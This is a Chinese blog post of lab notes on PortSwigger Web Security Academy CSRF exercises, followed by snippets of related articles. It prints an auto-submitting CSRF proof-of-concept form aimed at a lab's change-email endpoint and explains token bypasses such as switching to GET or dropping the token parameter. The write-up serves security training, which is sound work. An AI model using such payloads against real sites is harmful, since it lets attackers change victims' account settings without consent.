(三)CSRF实例

最新推荐文章于 2023-11-13 22:12:34 发布
最新推荐文章于 2023-11-13 22:12:34 发布
阅读量527 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43047908/article/details/115633260
版权

CSRF vulnerability with no defenses

电子邮件更改功能容易受到CSRF的攻击。
通过Burp Suite代理访问流量,登录到帐户,更新电子邮件,然后在代理历史记录中查找结果请求。

构造Poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://ac451f2a1f42217181c428d20037006a.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="609959783&#64;qq&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

即可生成一个伪造的HTML请求,实现攻击。

CSRF where token validation depends on request method

token尝试阻止CSRF攻击,但仅将防御应用于某些类型的请求。

将请求发送到Burp Repeater,观察到如果更改csrf参数的值,则该请求将被拒绝。

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
X-XSS-Protection: 0
Connection: close
Content-Length: 20

"Invalid CSRF token"

因此我们可以选择更改请求方法,将其转换为GET请求,则其不再验证CSRF token。

接下来然后就重复上个实例得操作即可实现CSRF攻击。

CSRF where token validation depends on token being present

同样上述操作,发现更改csrf参数同样返回

HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
X-XSS-Protection: 0
Connection: close
Content-Length: 20

"Invalid CSRF token"

同样也尝试了修改请求方法,发现也失败了。
那我们换一种思路,直接把csrf参数整个删掉会怎么样呢?
当我们把csrf参数删掉后,发现成功返回请求响应。
因而可以成功实现csrf攻击。

CSRF where token is not tied to user session

使用令牌来尝试防止CSRF攻击,但它们并未集成到站点的会话处理系统中。

她总是阴雨天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞挖掘】——40、 CSRF攻防对抗(中)
Fly_鹏程万里
06-07 24
部分应用程序不会验证Token是否与发出请求的用户属于同一个会话,相反应用程序维护一个它已经发布的全局Token池并接受该池中出现的任何令牌,在这种情况下攻击者可以使用自己的帐户登录应用程序并获取有效的token,然后在CSRF攻击中将该token提供给受害用户在上述漏洞的变体中一些应用程序将CSRF token绑定到cookie,但不绑定到用于跟踪会话的同一cookie,当应用程序采用两个不同的框架(一个用于会话处理,一个用于CSRF保护)而这两个框架没有集成在一起时就很容易发生这种情况。
csrf漏洞例子(html、css、JavaScript、php)
04-26
demo例子操作步骤 1、登录获取身份认证(这里用到session) 2、登录后点击跳转进入有漏洞的网站(这里模拟的是黑客发给受害者的地址) 3、点击跳转后是一个图片 注解:其中src的地址money.php是网站的转账接口 其中name是转给谁,money是转多少钱 一旦目标登录了网站访问了这个网页,就会利用session给jake转账100元 可以在目录下查看journal.txt查看转账日志//每刷新一次页面就会转一次账
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
yinjiyufei的博客
01-14 3215
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
Lab: CSRF where token validation depends on request method:CSRF,其中令牌验证取决于请求方法...
Zeker62的博客
08-26 287
CSRF,其中令牌验证取决于请求方法 漏洞 某些应用程序在请求使用 POST 方法时正确验证令牌,但在使用 GET 方法时跳过验证。 在这种情况下,攻击者可以切换到 GET 方法绕过验证并进行 CSRF 攻击: 沿用上次文章的代码,更改URL即可、 <html> <!-- CSRF PoC - generated by Burp Suite Professional --&...
web安全之CSRF漏洞——苦日7小时
weixin_52351575的博客
05-09 784
要想有CSRF漏洞,那么必须得参数可控,如果csrfcsrfKeysession者互相绑定在一起,那么就没戏.如果csrfcsrfkey是互相绑定的,但是session没有和他们绑定,那就相当于靶场4,一样可以绕过.
请求伪造漏洞(CSRF
weixin_44558065的博客
07-12 877
CSRF 概述:攻击者可伪造当前用户行为,让目标服务器误以为请求由当前用户发起,并利用当前权限实现业务请求伪造 相对的,也存在服务器端请求伪造(SSRF),攻击者可构造由服务器端发起请求的安全漏洞,可以让服务器执行一些在用户侧无法实现的效果,如内网探测、加载特定图片、文件等 两者区别在于伪造的身份不同,执行的效果和漏洞存在点不同 CSRF攻击 流程:攻击者伪造一个页面,页面功能为伪造当前用户的请求,当用户点击恶意页面时,会自动向当前用户的服务器提交攻击者伪造的业务请求,该请求是以用户身份发起,所以也会以用户
django 取消csrf限制的实例
09-17
在Django框架中,CSRF(Cross-site request forgery,跨站请求伪造)是一种重要的安全机制,用于防止恶意第方在用户浏览器中伪造请求到你的应用。然而,在某些情况下,例如前后端分离的项目或者API接口,你可能...
CSRF跨站请求伪造实例程序
11-07
最后,`说明.txt`可能提供了有关这个实例的更多信息,包括如何运行和测试CSRF攻击。理解这个文件的内容可以帮助我们更好地了解攻击者如何利用这些组件进行攻击。 总之,这个实例展示了如何利用PHP构建一个易受CSRF...
信息安全技术:CSRF实例.pptx
11-01
信息安全技术基础
2021-5-10CSRF漏洞实例
05-13
2021-5-10CSRF漏洞实例,对新手比较友好
CSRF跨站请求伪造攻击(附自动化工具实战某CMS)
m0_51468027的博客
02-02 2921
一、CSRF介绍   CSRF全称为跨站请求伪造(Cross-site request forgery),是一种网络攻击方式,也被称为 one-click attack 或者 session riding。通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像xss漏洞,但是它与xss漏洞非常不同。xss利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。与xss攻击相比,csrf攻击往往不大流行,也难以防范,所以认为比xss漏洞更具危险性 二、CSRF漏洞原理   CS
burpsuite生成POC验证CSRF过程及原理
热门推荐
qq_41123867的博客
02-19 1万+
一.CSRF漏洞成因: 浏览器访问web服务器A,登录状态下,再用同一个浏览器访问了恶意服务器B,服务器B返回给浏览器的页面中含有要求访问服务器A的恶意代码,用户不知情的情况下点击后,导致服务器A接收到来自服务器B的通过浏览器发起的恶意请求 根据上图可知,要验证CSRF,需要在访问网站A后获得cookie后,再访问一个会返回恶意代码的网站B,返回的恶意代码必须能导致访问网站A ,如果能通过返回的...
TOP16之CSRF -- 小黑超细详解+案例说明<宝藏文>
G_WEB_Xie的博客
03-31 804
CSRF -- 跨站请求伪造,很好理解,就是盗用别人的身份伪造请求发送给服务器,在未授权的情况下执行权限保护之内的操作,因为请求的一切流程都是正常操作,这也是一般不会被检测到的漏洞行为。小黑子们,撸起袖子加油干!!!
CSRF跨域攻击实例与防范
weixin_52224421的博客
01-20 481
CSRF跨域攻击实例与防范
CSRF实战案例
yuan_boss的博客
08-28 1236
CSRF中文名叫做跨站请求伪造,很容易知道这是一个跨站攻击的漏洞,也就是说我们可以让受害者在我们构造的恶意站点执行我们构造的恶意请求,从而请求到另一个网站,请求另一个网站的时候受害者会携带自己的cookie信息,进而借助受害者的cookie来执行我们的恶意请求。。在以下案例中,我会实现一个基本的CSRF攻击。我将会构造一个恶意的游戏界面,其中图片链接里面内嵌了我们的恶意请求,让受害者点击,点击之后将会携带受害者的cookie并且向正常站点发起请求,从而完成攻击。那么我们应该如何构造恶意请求呢?
CSRF和SSRF漏洞案例讲解
weixin_46739058的博客
04-09 3324
CSRF的概念 CSRF:跨站请求伪造(Cross-site request forgery)CSRF是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。当用户访问含有恶意代码的网页时,会向指定正常网站发送非本人意愿的数据请求包(如转账给hack,向hack发送API等)如果此时用户恰好登录了该正常网站(也就是身份验证是正常的)就会执行该恶意代码的请求,从而造成CSRF。 与在XSS章节中提到的在博客里写入获取cookie的代码,在管理员登录后台查看时就会窃取其cookie有异曲..
Lab: CSRF vulnerability with no defenses:没有防御的CSRF漏洞
Zeker62的博客
08-25 619
使用您的浏览器通过 Burp Suite 代理流量,登录您的帐户,提交“更新电子邮件”表单,然后在您的代理历史记录中找到生成的请求。 如果您使用Burp Suite Professional,请右键单击请求报文并选择 Engagement tools / Generate CSRF PoC。启用包含自动提交脚本的选项,然后单击“重新生成”。 把submit 去掉,测试者不会自己点按钮 ...
PortSwigger Academy | Cross-site request forgery (CSRF) : 跨站请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
02-02 1097
文章目录什么是CSRFCSRF攻击有什么影响?CSRF如何工作?使用SameSite Cookie防御CSRF如何构造CSRF攻击Lab: CSRF vulnerability with no defenses如何进行CSRF攻击XSS vs CSRFXSS和CSRF有什么区别?CSRF令牌可以阻止XSS攻击吗?防止CSRF攻击CSRF token什么是CSRF令牌?CSRF令牌应如何生成?CSRF令牌应如何传输?CSRF令牌应如何验证?常见的CSRF漏洞CSRF令牌的验证取决于请求方法Lab: CSRF
portswigger CSRF vulnerability with no defenses(lab1)
最新发布
weixin_51559599的博客
11-13 68
用户访问恶意网站执行更改邮箱的指令。
Groovy csrf java 示例
07-14
以下是一个使用 Groovy 和 Java 进行 CSRF 防护的示例: ```groovy import javax.servlet.http.HttpServletRequest // 生成 CSRF 令牌 def generateCSRFToken() { // 在这里实现你的逻辑来生成随机的 CSRF 令牌 // 例如,可以使用 java.util.UUID 类生成唯一的令牌 String token = UUID.randomUUID().toString() return token } // 验证 CSRF 令牌 def validateCSRFToken(HttpServletRequest request) { def session = request.getSession(false) def token = request.getParameter("csrfToken") if (session && token) { def storedToken = session.getAttribute("csrfToken") if (storedToken && storedToken.equals(token)) { // 令牌验证通过 return true } } // 令牌验证失败 return false } // 处理 POST 请求,包括 CSRF 令牌的生成和验证 def handlePostRequest(HttpServletRequest request) { if (request.getMethod() == "POST") { if (validateCSRFToken(request)) { // CSRF 令牌验证通过,执行你的逻辑 // ... return "Post request handled successfully." } else { // CSRF 令牌验证失败,抛出异常或返回错误信息 throw new Exception("CSRF token validation failed.") } } } // 示例用法 def request = new HttpServletRequest() // 实例化 HttpServletRequest 对象,这里需要根据你的实际情况进行调整 // 生成 CSRF 令牌并存储在会话中 def csrfToken = generateCSRFToken() request.getSession().setAttribute("csrfToken", csrfToken) // 将 CSRF 令牌添加到表单中 def form = "<form action='/submit' method='post'>" + "<input type='hidden' name='csrfToken' value='${csrfToken}' />" + // 其他表单字段 "<input type='submit' value='Submit' />" + "</form>" // 处理 POST 请求 def response = handlePostRequest(request) println(form) println(response) ``` 请注意,这只是一个简单的示例,你需要根据你的具体需求和框架来进行适当的调整和扩展。确保在真实应用中使用安全的随机数生成算法和其他安全最佳实践来提高防护效果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值